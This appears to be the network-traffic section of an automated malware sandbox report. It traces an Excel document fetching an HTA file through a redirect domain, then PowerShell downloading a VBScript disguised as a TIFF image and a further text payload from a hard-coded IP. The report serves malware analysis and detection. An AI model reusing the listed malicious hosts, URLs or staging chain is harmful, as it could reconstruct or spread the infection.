                                                                                              Oct 24, 2024 08:40:14.088443995 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.088479996 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.088586092 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.088586092 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.088607073 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.090451002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.090480089 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.090511084 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.090527058 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.090533972 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.103713989 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.105473995 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.105505943 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.105565071 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.105565071 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.105580091 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.128205061 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.128238916 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.128336906 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.128338099 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.128359079 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188486099 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188527107 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188637018 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.188637018 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.188661098 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188740969 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.188760042 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188771963 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188806057 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.188808918 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188826084 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.188868999 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.189459085 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.189493895 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.189559937 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.189559937 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.189569950 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.189667940 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.192085028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.192120075 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.192163944 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.192173958 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.192203999 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.211086035 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.211124897 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.211249113 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.211282015 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.211406946 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.212589979 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.212621927 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.212660074 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.212660074 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.212681055 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.212691069 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.224808931 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.224843979 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.224946022 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.224971056 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.224991083 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.225157976 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787220001 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787300110 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787307024 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787365913 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787786007 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787820101 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787849903 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787849903 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.787859917 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.787874937 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.789706945 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.794965029 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.794996977 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.795075893 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.795075893 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.795084953 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804536104 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804569960 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.804727077 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.804743052 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.805095911 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807647943 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.807678938 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.807769060 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807769060 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.807777882 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817341089 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817375898 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817436934 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.817445040 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.817459106 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.836142063 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836210012 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836330891 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.836348057 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.836410046 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845268965 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845304012 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845376015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845376015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.845386028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.845474005 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.872895002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.872919083 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.873075008 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.873075008 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.873090029 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904768944 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904807091 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904896021 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.904906034 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.904930115 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.904930115 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905225039 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905256033 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905313015 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905322075 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905349970 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905349970 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905867100 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905900002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.905950069 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905950069 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.905958891 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.906037092 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.906133890 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.906450033 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:18.566858053 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.572436094 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:18.572737932 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.572737932 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.578144073 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:18.619843960 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:18.671087027 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:19.075103998 CEST8049175192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:19.075213909 CEST4917580192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.313595057 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.319082975 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:27.319149017 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.319303989 CEST4917680192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:40:27.324610949 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:27.990432978 CEST8049176192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:40:28.073266029 CEST4917680192.168.2.22192.210.215.8
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 24, 2024 08:39:28.023102045 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:39:28.030781984 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:39:31.281980038 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:39:31.302525043 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:39:51.759336948 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:39:51.768742085 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:39:55.070646048 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:39:55.086539984 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:39:58.218770981 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:39:58.235421896 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:40:06.265902996 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:40:06.276474953 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22 |
| Oct 24, 2024 08:40:08.239335060 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8 |
| Oct 24, 2024 08:40:08.255554914 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 24, 2024 08:39:28.023102045 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c13 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:31.281980038 CEST | 192.168.2.22 | 8.8.8.8 | 0xd86c | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:51.759336948 CEST | 192.168.2.22 | 8.8.8.8 | 0x2ffa | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:55.070646048 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c08 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:58.218770981 CEST | 192.168.2.22 | 8.8.8.8 | 0xce1f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:40:06.265902996 CEST | 192.168.2.22 | 8.8.8.8 | 0x56b1 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:40:08.239335060 CEST | 192.168.2.22 | 8.8.8.8 | 0x6875 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 24, 2024 08:39:28.030781984 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c13 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:31.302525043 CEST | 8.8.8.8 | 192.168.2.22 | 0xd86c | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:51.768742085 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ffa | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:55.086539984 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c08 | No error (0) | drive.google.com | | 216.58.212.174 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:39:58.235421896 CEST | 8.8.8.8 | 192.168.2.22 | 0xce1f | No error (0) | drive.usercontent.google.com | | 142.250.186.97 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:40:06.276474953 CEST | 8.8.8.8 | 192.168.2.22 | 0x56b1 | No error (0) | drive.google.com | | 216.58.212.174 | A (IP address) | IN (0x0001) | false |
| Oct 24, 2024 08:40:08.255554914 CEST | 8.8.8.8 | 192.168.2.22 | 0x6875 | No error (0) | drive.usercontent.google.com | | 142.250.186.97 | A (IP address) | IN (0x0001) | false |
                                                                                              • u4u.kids
                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com
                                                                                              • 192.210.215.8
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.22 | 49162 | 192.210.215.8 | 80 | 3404 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:39:29.252609968 CEST | 383 | OUT | GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 192.210.215.8
                                                                                              Connection: Keep-Alive
Oct 24, 2024 08:39:29.928579092 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 06:39:29 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                              Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
                                                                                              ETag: "20b6a-6251ccc7de906"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 133994
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49164 | 192.210.215.8 | 80 | 3688 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:39:32.654067039 CEST | 460 | OUT | GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Range: bytes=8896-
Connection: Keep-Alive
Host: 192.210.215.8
If-Range: "20b6a-6251ccc7de906"
Oct 24, 2024 08:39:33.317365885 CEST | 1236 | IN | HTTP/1.1 206 Partial Content
Date: Thu, 24 Oct 2024 06:39:33 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
ETag: "20b6a-6251ccc7de906"
Accept-Ranges: bytes
Content-Length: 125098
Content-Range: bytes 8896-133993/133994
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49165 | 192.210.215.8 | 80 | 3772 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:39:42.828366995 CEST | 363 | OUT | GET /540/createdbestthingswithniceworkgreath.tIF HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.210.215.8
Connection: Keep-Alive
Oct 24, 2024 08:39:43.515580893 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 06:39:43 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 23 Oct 2024 03:47:53 GMT
ETag: "22522-6251cc0237337"
Accept-Ranges: bytes
Content-Length: 140578
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Ascii: private function CreateSession(wsman, conStr, optDic, pingado) dim bombardeioFlags dim conOpt dim bombardeio dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword bombardeioFlags = 0 proxyAccess
Oct 24, 2024 08:39:43.515607119 CEST | 224 | IN | Data Ascii: Type = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal
Oct 24, 2024 08:39:43.515651941 CEST | 1236 | IN | Data Ascii: = 0 proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA
Oct 24, 2024 08:39:43.515727043 CEST | 1236 | IN | Data Ascii: ' Invalid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end
Oct 24, 2024 08:39:43.515738964 CEST | 424 | IN | Data Ascii: ESSL & "' option is only valid when used with the '-remote' option" bombardeioFlags = bombardeioFlags OR wsman.S
Oct 24, 2024 08:39:43.515813112 CEST | 1236 | IN | Data Ascii: SERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case
Oct 24, 2024 08:39:43.515825987 CEST | 1236 | IN | Data Ascii: alid for '-auth:none'" case VAL_BASIC 'Use -username and -password. ASSE
Oct 24, 2024 08:39:43.515836954 CEST | 424 | IN | Data Ascii: xists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:digest'" ASSER
Oct 24, 2024 08:39:43.515908003 CEST | 1236 | IN | Data Ascii: for '-auth:digest'" bombardeioFlags = bombardeioFlags OR wsman.SessionFlagCredUsernamePassword OR wsman
Oct 24, 2024 08:39:43.515945911 CEST | 212 | IN | Data Ascii: NPARA_CERT & "' option is not valid for '-auth:negotiate'" bombardeioFlags = bombardeioF
Oct 24, 2024 08:39:43.520983934 CEST | 1236 | IN | Data Ascii: lags OR wsman.SessionFlagUseNegotiate case VAL_CERT '-certificate is mandatory.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49170 | 192.210.215.8 | 80 | 1884 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:39:54.044867992 CEST | 495 | OUT | GET /540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Wed, 23 Oct 2024 03:51:20 GMT
Connection: Keep-Alive
Host: 192.210.215.8
If-None-Match: "20b6a-6251ccc7de906"
Oct 24, 2024 08:39:54.716686964 CEST | 275 | IN | HTTP/1.1 304 Not Modified
Date: Thu, 24 Oct 2024 06:39:54 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 23 Oct 2024 03:51:20 GMT
ETag: "20b6a-6251ccc7de906"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49175 | 192.210.215.8 | 80 | 204 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:40:18.572737932 CEST | 77 | OUT | GET /540/ERFFDR.txt HTTP/1.1
Host: 192.210.215.8
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49176 | 192.210.215.8 | 80 | 3900 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:40:27.319303989 CEST | 77 | OUT | GET /540/ERFFDR.txt HTTP/1.1
Host: 192.210.215.8
Connection: Keep-Alive
Oct 24, 2024 08:40:27.990432978 CEST | 540 | IN | HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 06:40:27 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Content-Length: 299
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 192.210.215.8 Port 80</address></body></html>


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              0 | 192.168.2.22 | 49161 | 24.199.88.84 | 443 | 3404 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:29 UTC | 462 | OUT | GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:29 UTC | 485 | IN | HTTP/1.1 302 Found
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 24 Oct 2024 06:39:29 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 106
                                                                                              Connection: close
                                                                                              X-DNS-Prefetch-Control: off
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Location: http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta
                                                                                              Vary: Accept
                                                                                              2024-10-24 06:39:29 UTC | 106 | IN | Data Ascii: Found. Redirecting to http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              1 | 192.168.2.22 | 49163 | 24.199.88.84 | 443 | 3688 | C:\Windows\System32\mshta.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-10-24 06:39:32 UTC | 486 | OUT | GET /LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: fr-FR
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: u4u.kids
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 06:39:32 UTC | 485 | IN | HTTP/1.1 302 Found
